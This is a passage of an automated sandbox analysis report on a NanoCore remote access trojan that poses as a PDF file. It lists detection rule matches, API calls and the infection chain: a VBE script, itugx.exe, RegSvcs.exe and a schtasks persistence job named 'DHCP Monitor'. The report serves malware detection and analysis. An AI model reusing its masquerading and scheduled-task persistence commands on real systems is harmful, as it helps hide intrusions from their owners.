Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0037F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

2_2_0037F122

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: String function: 00330DC0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: String function: 0032FD60 appears 40 times
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: String function: 00CDEC50 appears 56 times
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: String function: 00CDEB78 appears 39 times
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: String function: 00CDF5F0 appears 31 times

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00CC6FAA

Sample file is different than original file name gathered from version info

Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameautoruns.exeL, vs 026910003102350.pdf.scr.exe

Source: 026910003102350.pdf.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@43/44@4/2

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CC6C74 GetLastError,FormatMessageW,

0_2_00CC6C74

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00CDA6C2

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: 026910003102350.pdf.scr.exe	ReversingLabs: Detection: 46%
Source: 026910003102350.pdf.scr.exe	Virustotal: Detection: 45%

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

File read: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Jump to behavior

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\026910003102350.pdf.scr.exe C:\Users\user\Desktop\026910003102350.pdf.scr.exe
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
